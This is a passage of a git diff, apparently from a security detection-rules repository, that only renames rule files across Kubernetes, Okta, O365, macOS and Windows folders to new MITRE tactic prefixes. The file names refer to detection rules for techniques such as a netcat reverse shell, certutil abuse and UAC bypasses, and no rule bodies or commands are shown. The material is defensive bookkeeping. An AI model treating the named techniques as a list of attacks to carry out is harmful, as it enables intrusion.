rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml rename to rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml similarity index 100% rename from rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml rename to rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml similarity index 100% rename from rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml rename to rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml similarity index 100% rename from rules/integrations/kubernetes/execution_forbidden_creation_request.toml rename to rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml similarity index 100% rename from rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml rename to rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml similarity index 100% rename from rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml rename to rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/collection_exchange_transport_rule_creation.toml similarity index 100% rename from rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml rename to rules/integrations/o365/collection_exchange_transport_rule_creation.toml diff --git a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml similarity index 100% rename from rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml rename to rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml similarity index 100% rename from rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml rename to rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml similarity index 100% rename from rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml rename to rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml similarity index 100% rename from rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml rename to rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml similarity index 100% rename from rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml rename to rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml similarity index 100% rename from rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml rename to rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml similarity index 100% rename from rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml rename to rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml similarity index 100% rename from rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml rename to rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml similarity index 100% rename from rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml rename to rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml similarity index 100% rename from rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml rename to rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml similarity index 100% rename from rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml rename to rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml similarity index 100% rename from rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml rename to rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml similarity index 100% rename from rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml rename to rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml similarity index 100% rename from rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml rename to rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml similarity index 100% rename from rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml rename to rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml diff --git a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml similarity index 100% rename from rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml rename to rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml similarity index 100% rename from rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml rename to rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/defense_evasion_user_impersonation_access.toml similarity index 100% rename from rules/integrations/okta/credential_access_user_impersonation_access.toml rename to rules/integrations/okta/defense_evasion_user_impersonation_access.toml diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml similarity index 100% rename from rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml rename to rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/collection_high_volume_of_pbpaste.toml similarity index 100% rename from rules/macos/credential_access_high_volume_of_pbpaste.toml rename to rules/macos/collection_high_volume_of_pbpaste.toml diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/collection_suspicious_tcc_access_granted.toml similarity index 100% rename from rules/macos/defense_evasion_suspicious_tcc_access_granted.toml rename to rules/macos/collection_suspicious_tcc_access_granted.toml diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/command_and_control_curl_execution_via_shell_profile.toml similarity index 100% rename from rules/macos/persistence_curl_execution_via_shell_profile.toml rename to rules/macos/command_and_control_curl_execution_via_shell_profile.toml diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/command_and_control_installer_package_spawned_network_event.toml similarity index 100% rename from rules/macos/execution_installer_package_spawned_network_event.toml rename to rules/macos/command_and_control_installer_package_spawned_network_event.toml diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml similarity index 100% rename from rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml rename to rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/defense_evasion_account_creation_hide_at_logon.toml similarity index 100% rename from rules/macos/persistence_account_creation_hide_at_logon.toml rename to rules/macos/defense_evasion_account_creation_hide_at_logon.toml diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml similarity index 100% rename from rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml rename to rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml diff --git a/rules/macos/persistence_hidden_plist_filename.toml b/rules/macos/defense_evasion_hidden_plist_filename.toml similarity index 100% rename from rules/macos/persistence_hidden_plist_filename.toml rename to rules/macos/defense_evasion_hidden_plist_filename.toml diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/defense_evasion_suspicious_sip_check.toml similarity index 100% rename from rules/macos/discovery_suspicious_sip_check.toml rename to rules/macos/defense_evasion_suspicious_sip_check.toml diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/execution_applescript_with_admin_privs.toml similarity index 100% rename from rules/macos/privilege_escalation_applescript_with_admin_privs.toml rename to rules/macos/execution_applescript_with_admin_privs.toml diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/execution_explicit_creds_via_scripting.toml similarity index 100% rename from rules/macos/privilege_escalation_explicit_creds_via_scripting.toml rename to rules/macos/execution_explicit_creds_via_scripting.toml diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/execution_perl_outbound_network_connection.toml similarity index 100% rename from rules/macos/command_and_control_perl_outbound_network_connection.toml rename to rules/macos/execution_perl_outbound_network_connection.toml diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/execution_suspicious_mac_ms_office_child_process.toml similarity index 100% rename from rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml rename to rules/macos/execution_suspicious_mac_ms_office_child_process.toml diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/initial_access_vpn_connection_attempt.toml similarity index 100% rename from rules/macos/lateral_movement_vpn_connection_attempt.toml rename to rules/macos/initial_access_vpn_connection_attempt.toml diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/persistence_local_user_added_to_admin.toml similarity index 100% rename from rules/macos/privilege_escalation_local_user_added_to_admin.toml rename to rules/macos/persistence_local_user_added_to_admin.toml diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/persistence_remote_ssh_login_enabled.toml similarity index 100% rename from rules/macos/lateral_movement_remote_ssh_login_enabled.toml rename to rules/macos/persistence_remote_ssh_login_enabled.toml diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/persistence_root_crontab_filemod.toml similarity index 100% rename from rules/macos/privilege_escalation_root_crontab_filemod.toml rename to rules/macos/persistence_root_crontab_filemod.toml diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/persistence_user_added_to_admin_group.toml similarity index 100% rename from rules/macos/privilege_escalation_user_added_to_admin_group.toml rename to rules/macos/persistence_user_added_to_admin_group.toml diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/defense_evasion_ml_windows_anomalous_script.toml similarity index 100% rename from rules/ml/execution_ml_windows_anomalous_script.toml rename to rules/ml/defense_evasion_ml_windows_anomalous_script.toml diff --git a/rules/ml/persistence_ml_rare_process_by_host_linux.toml b/rules/ml/execution_ml_rare_process_by_host_linux.toml similarity index 100% rename from rules/ml/persistence_ml_rare_process_by_host_linux.toml rename to rules/ml/execution_ml_rare_process_by_host_linux.toml diff --git a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml b/rules/ml/execution_ml_windows_anomalous_path_activity.toml similarity index 100% rename from rules/ml/persistence_ml_windows_anomalous_path_activity.toml rename to rules/ml/execution_ml_windows_anomalous_path_activity.toml diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/execution_ml_windows_anomalous_process_creation.toml similarity index 100% rename from rules/ml/persistence_ml_windows_anomalous_process_creation.toml rename to rules/ml/execution_ml_windows_anomalous_process_creation.toml diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml similarity index 100% rename from rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml rename to rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml diff --git a/rules/network/initial_access_react_server_components_rce_attempt.toml b/rules/network/execution_react_server_components_rce_attempt.toml similarity index 100% rename from rules/network/initial_access_react_server_components_rce_attempt.toml rename to rules/network/execution_react_server_components_rce_attempt.toml diff --git a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml similarity index 100% rename from rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml rename to rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/initial_access_accepted_default_telnet_port_connection.toml similarity index 100% rename from rules/network/command_and_control_accepted_default_telnet_port_connection.toml rename to rules/network/initial_access_accepted_default_telnet_port_connection.toml diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml similarity index 100% rename from rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml rename to rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml similarity index 100% rename from rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml rename to rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/reconnaissance_unsecure_elasticsearch_node.toml similarity index 100% rename from rules/network/initial_access_unsecure_elasticsearch_node.toml rename to rules/network/reconnaissance_unsecure_elasticsearch_node.toml diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml b/rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml similarity index 100% rename from rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml rename to rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml b/rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml similarity index 100% rename from rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml rename to rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/defense_evasion_endgame_permission_theft_detected.toml similarity index 100% rename from rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml rename to rules/promotions/defense_evasion_endgame_permission_theft_detected.toml diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml similarity index 100% rename from rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml rename to rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml b/rules/promotions/defense_evasion_endgame_process_injection_detected.toml similarity index 100% rename from rules/promotions/privilege_escalation_endgame_process_injection_detected.toml rename to rules/promotions/defense_evasion_endgame_process_injection_detected.toml diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml b/rules/promotions/defense_evasion_endgame_process_injection_prevented.toml similarity index 100% rename from rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml rename to rules/promotions/defense_evasion_endgame_process_injection_prevented.toml diff --git a/rules/windows/credential_access_adidns_wildcard.toml b/rules/windows/collection_adidns_wildcard.toml similarity index 100% rename from rules/windows/credential_access_adidns_wildcard.toml rename to rules/windows/collection_adidns_wildcard.toml diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/collection_browsers_unusual_parent.toml similarity index 100% rename from rules/windows/credential_access_browsers_unusual_parent.toml rename to rules/windows/collection_browsers_unusual_parent.toml diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/collection_dnsnode_creation.toml similarity index 100% rename from rules/windows/credential_access_dnsnode_creation.toml rename to rules/windows/collection_dnsnode_creation.toml diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/collection_web_config_file_access.toml similarity index 100% rename from rules/windows/credential_access_web_config_file_access.toml rename to rules/windows/collection_web_config_file_access.toml diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml similarity index 100% rename from rules/windows/execution_command_prompt_connecting_to_the_internet.toml rename to rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/command_and_control_msiexec_remote_payload.toml similarity index 100% rename from rules/windows/defense_evasion_msiexec_remote_payload.toml rename to rules/windows/command_and_control_msiexec_remote_payload.toml diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/command_and_control_revshell_cmd_via_netcat.toml similarity index 100% rename from rules/windows/execution_revshell_cmd_via_netcat.toml rename to rules/windows/command_and_control_revshell_cmd_via_netcat.toml diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/command_and_control_scripting_remote_webdav.toml similarity index 100% rename from rules/windows/execution_scripting_remote_webdav.toml rename to rules/windows/command_and_control_scripting_remote_webdav.toml diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/command_and_control_suspicious_certutil_commands.toml similarity index 100% rename from rules/windows/defense_evasion_suspicious_certutil_commands.toml rename to rules/windows/command_and_control_suspicious_certutil_commands.toml diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml similarity index 100% rename from rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml rename to rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml similarity index 100% rename from rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml rename to rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/credential_access_posh_hacktool_functions.toml similarity index 100% rename from rules/windows/execution_posh_hacktool_functions.toml rename to rules/windows/credential_access_posh_hacktool_functions.toml diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/credential_access_smb_rare_destination.toml similarity index 100% rename from rules/windows/exfiltration_smb_rare_destination.toml rename to rules/windows/credential_access_smb_rare_destination.toml diff --git a/rules/windows/lateral_movement_alternate_creds_pth.toml b/rules/windows/defense_evasion_alternate_creds_pth.toml similarity index 100% rename from rules/windows/lateral_movement_alternate_creds_pth.toml rename to rules/windows/defense_evasion_alternate_creds_pth.toml diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/defense_evasion_com_object_xwizard.toml similarity index 100% rename from rules/windows/execution_com_object_xwizard.toml rename to rules/windows/defense_evasion_com_object_xwizard.toml diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/defense_evasion_command_shell_via_rundll32.toml similarity index 100% rename from rules/windows/execution_command_shell_via_rundll32.toml rename to rules/windows/defense_evasion_command_shell_via_rundll32.toml diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/defense_evasion_create_process_as_different_user.toml similarity index 100% rename from rules/windows/privilege_escalation_create_process_as_different_user.toml rename to rules/windows/defense_evasion_create_process_as_different_user.toml diff --git a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml b/rules/windows/defense_evasion_create_process_with_token_unpriv.toml similarity index 100% rename from rules/windows/privilege_escalation_create_process_with_token_unpriv.toml rename to rules/windows/defense_evasion_create_process_with_token_unpriv.toml diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/defense_evasion_dcom_mmc20.toml similarity index 100% rename from rules/windows/lateral_movement_dcom_mmc20.toml rename to rules/windows/defense_evasion_dcom_mmc20.toml diff --git a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml similarity index 100% rename from rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml rename to rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/defense_evasion_disable_uac_registry.toml similarity index 100% rename from rules/windows/privilege_escalation_disable_uac_registry.toml rename to rules/windows/defense_evasion_disable_uac_registry.toml diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml similarity index 100% rename from rules/windows/persistence_evasion_hidden_local_account_creation.toml rename to rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml similarity index 100% rename from rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml rename to rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml similarity index 100% rename from rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml rename to rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/defense_evasion_expired_driver_loaded.toml similarity index 100% rename from rules/windows/privilege_escalation_expired_driver_loaded.toml rename to rules/windows/defense_evasion_expired_driver_loaded.toml diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml similarity index 100% rename from rules/windows/initial_access_exploit_jetbrains_teamcity.toml rename to rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/defense_evasion_from_unusual_path_cmdline.toml similarity index 100% rename from rules/windows/execution_from_unusual_path_cmdline.toml rename to rules/windows/defense_evasion_from_unusual_path_cmdline.toml diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml similarity index 100% rename from rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml rename to rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/defense_evasion_krbrelayup_service_creation.toml similarity index 100% rename from rules/windows/privilege_escalation_krbrelayup_service_creation.toml rename to rules/windows/defense_evasion_krbrelayup_service_creation.toml diff --git a/rules/windows/privilege_escalation_make_token_local.toml b/rules/windows/defense_evasion_make_token_local.toml similarity index 100% rename from rules/windows/privilege_escalation_make_token_local.toml rename to rules/windows/defense_evasion_make_token_local.toml diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/defense_evasion_msi_installer_task_startup.toml similarity index 100% rename from rules/windows/persistence_msi_installer_task_startup.toml rename to rules/windows/defense_evasion_msi_installer_task_startup.toml diff --git a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml b/rules/windows/defense_evasion_newcreds_logon_rare_process.toml similarity index 100% rename from rules/windows/privilege_escalation_newcreds_logon_rare_process.toml rename to rules/windows/defense_evasion_newcreds_logon_rare_process.toml diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/defense_evasion_posh_portable_executable.toml similarity index 100% rename from rules/windows/execution_posh_portable_executable.toml rename to rules/windows/defense_evasion_posh_portable_executable.toml diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/defense_evasion_posh_token_impersonation.toml similarity index 100% rename from rules/windows/privilege_escalation_posh_token_impersonation.toml rename to rules/windows/defense_evasion_posh_token_impersonation.toml diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml similarity index 100% rename from rules/windows/initial_access_potential_webhelpdesk_exploit.toml rename to rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml similarity index 100% rename from rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml rename to rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/defense_evasion_rdp_enabled_registry.toml similarity index 100% rename from rules/windows/lateral_movement_rdp_enabled_registry.toml rename to rules/windows/defense_evasion_rdp_enabled_registry.toml diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml similarity index 100% rename from rules/windows/execution_register_server_program_connecting_to_the_internet.toml rename to rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml similarity index 100% rename from rules/windows/persistence_sdprop_exclusion_dsheuristics.toml rename to rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/defense_evasion_services_registry.toml similarity index 100% rename from rules/windows/persistence_services_registry.toml rename to rules/windows/defense_evasion_services_registry.toml diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml similarity index 100% rename from rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml rename to rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/defense_evasion_suspicious_ms_office_child_process.toml similarity index 100% rename from rules/windows/initial_access_suspicious_ms_office_child_process.toml rename to rules/windows/defense_evasion_suspicious_ms_office_child_process.toml diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/defense_evasion_suspicious_psexesvc.toml similarity index 100% rename from rules/windows/execution_suspicious_psexesvc.toml rename to rules/windows/defense_evasion_suspicious_psexesvc.toml diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml similarity index 100% rename from rules/windows/initial_access_suspicious_windows_server_update_svc.toml rename to rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml similarity index 100% rename from rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml rename to rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/defense_evasion_uac_bypass_com_clipup.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_com_clipup.toml rename to rules/windows/defense_evasion_uac_bypass_com_clipup.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml rename to rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml rename to rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml 